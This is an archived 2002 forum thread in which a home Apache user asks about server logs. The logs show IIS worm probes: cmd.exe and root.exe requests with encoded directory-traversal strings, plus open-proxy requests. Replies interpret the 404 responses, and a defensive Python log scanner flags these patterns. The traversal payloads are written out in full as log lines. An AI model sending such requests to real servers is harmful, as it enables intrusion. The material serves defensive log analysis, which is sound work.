| Thread ID: 18793 | 2002-05-02 09:38:00 | is someone trying to hack into my server or what? logs provided. | Guest (0) | Press F1 |
| Post ID | Timestamp | Content | User | ||
| 46797 | 2002-05-02 09:38:00 | I'm running Apache for Windows on a 98SE Pentium machine. I had a look at my server logs and am bewildered, and out of my depth. Someone keeps trying to make the strangest of requests, same pattern, not always the same IP. I'm not sure whether to be concerned, but here they are:
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:39 +1200] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:40 +1200] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:43 +1200] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:43 +1200] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:43 +1200] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:43 +1200] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 775
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:44 +1200] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:45 +1200] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:45 +1200] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 702
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:45 +1200] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 702
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:46 +1200] 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:28:46 +1200] 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:29 +1200] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:30 +1200] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:30 +1200] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:31 +1200] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:31 +1200] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:32 +1200] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:32 +1200] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:33 +1200] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:33 +1200] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:33 +1200] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 775
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:34 +1200] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:34 +1200] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 2375
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:35 +1200] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 702
202-0-34-3.cable.paradise.net.nz - - [02/May/2002:13:30:35 +1200] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 702
61.157.252.242 - - [02/May/2002:15:10:15 +1200] 'GET www.ebay.com/ HTTP 200 2660
61.157.252.242 - - [02/May/2002:15:12:21 +1200] 'GET www.ebay.com/ HTTP 200 2660
The last one also has me confused, as it would appear that someone managed to access eBay via me, which I assume is impossible. | Guest (0) |
| 46798 | 2002-05-02 21:53:00 | I've seen this activity before. Those requests that are being made are used to see your directory and content inside. I am not sure how they exploit what they see though but it is of a concern. I know they can't download the files without it being corrupt (I think) so that is safe but maybe they can execute a file or something. | Guest (0) | ||
| 46799 | 2002-05-02 22:34:00 | This particular customer then went through the same dance at 15:12, followed again by what appears to be 61.157.252.242 accessing www.e-bay.com (still utterly confused by that one, given that I am not e-bay). Any clues and security suggestions would be welcomed! Thanx. | Guest (0) |
| 46800 | 2002-05-03 04:51:00 | They have been trying. Very trying. You seem to be OK, the code 404 shows that they weren't able to get to the system directories. The ebay entries show an attempt to use you as a forwarder. I'm not sure what code 200 means -- but I *think* it is an error. Non-error codes are 0xx, I seem to remember. You must have been lucky with the default security settings. | Guest (0) |
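A defender-side check for the kind of log posted above, added here as an example and not part of the thread: it parses Apache common-log lines, collapses double and overlong percent-encoding so the `..%255c..` style traversal is recognised, flags requests for `cmd.exe`/`root.exe`, flags proxy-style requests whose target is another site's address (the www.ebay.com entries), and records whether the status was a 2xx, i.e. whether the server actually answered. The sample lines are constructed, modelled on the thread's, with hosts replaced by documentation addresses.

```python
import re
from urllib.parse import unquote

# Apache common log format: host ident user [time] "METHOD target [version]" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3}) (\S+)')
# %c0%af, %c1%9c, %c1%1c ...: overlong or invalid UTF-8 bytes that old IIS decoded as '/' or '\'
OVERLONG_RE = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)
EXEC_RE = re.compile(r'(?:cmd|root)\.exe', re.I)

def normalise(target):
    """Percent-decode until stable so %255c -> %5c -> '\\' collapses, then unify slashes."""
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target.replace('\\', '/').lower()

def classify(line):
    """None for lines that do not parse; else host, status, warning tags and whether it was answered."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, _ts, _method, target, status, _size = m.groups()
    tags = []
    if not target.startswith('/'):
        tags.append('absolute-url')  # client asked this server to fetch another site: open-proxy probe
    if OVERLONG_RE.search(target):
        tags.append('overlong-utf8')
    norm = normalise(target)
    if '/../' in norm:
        tags.append('traversal')
    if EXEC_RE.search(norm):
        tags.append('exec-probe')  # cmd.exe / root.exe with ?/c+dir is the IIS worm (Nimda) probe set
    # 4xx means Apache refused it or had no such file; 2xx means the request was actually answered
    return {'host': host, 'status': int(status), 'tags': tags, 'served': status.startswith('2')}

def suspicious(log_text):
    """Only the parsed lines that carry at least one warning tag, in log order."""
    return [r for r in map(classify, log_text.splitlines()) if r and r['tags']]

# Constructed sample lines modelled on the thread's (hosts replaced with documentation names)
SAMPLE_LOG = """\
cable.example.net - - [02/May/2002:13:28:39 +1200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2375
cable.example.net - - [02/May/2002:13:28:43 +1200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2375
cable.example.net - - [02/May/2002:13:28:44 +1200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2375
cable.example.net - - [02/May/2002:13:28:45 +1200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 702
192.0.2.10 - - [02/May/2002:15:10:15 +1200] "GET www.ebay.com/ HTTP/1.0" 200 2660
192.0.2.11 - - [02/May/2002:15:20:00 +1200] "GET /index.html HTTP/1.0" 200 1024
"""
```

Calling `suspicious(SAMPLE_LOG)` returns the five probe lines with their tags; only the proxy-style request carries `served=True`, which is the one worth checking against the server's proxy configuration.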
| 46801 | 2002-05-03 08:34:00 | '200' is the normal serving of a file, a non-error. At least it is when it is the serving of what is usually requested. This 'trying to get in' that I displayed is only the tip of the iceberg; there is so much of this pattern, and from so many IP addresses, many of which, like me, are cable.paradise.net.nz. If anyone wants to have a look, rather than post the whole thing here, I have put day 1 till 2 May here: www.something.net.nz It amazes me, the site isn't even announced or finished yet, but I am already getting people/viri attempting to abuse my server! | Guest (0) |
| 46803 | 2002-05-04 08:28:00 | A little research into the oddities coming up on my logs shows me that if I was running a Microsoft server on a Microsoft OS without all the latest bandaids, I would probably be in trouble by now; however, seeing I am running Apache, I am 'probably' all right, even though the OS is 98SE. I still feel uneasy. However, there must be LOTS of people out there proudly running 'all Microsoft' web servers without their band aids, whose servers are wasting their bandwidth trying to mess up other servers, and grind the entire internet into something sluggier than a slug. While I have no plans to shut the server down yet, I want to buy a CHEAP machine to sit in the corner of my office, and take over that task for me. There are only 3 specifications. 1. Cheap 2. All hardware Linux compatible. 3. New enough to support newer large drives (80 gig) as I also need to solve my storage problems 4. (yes I know I said 3) I don't need a monitor. I have a really nasty 14" monitor that will be fine for this purpose. .... Anyone want to sell me such a machine, or perhaps the components to put such a machine together??? | Guest (0) |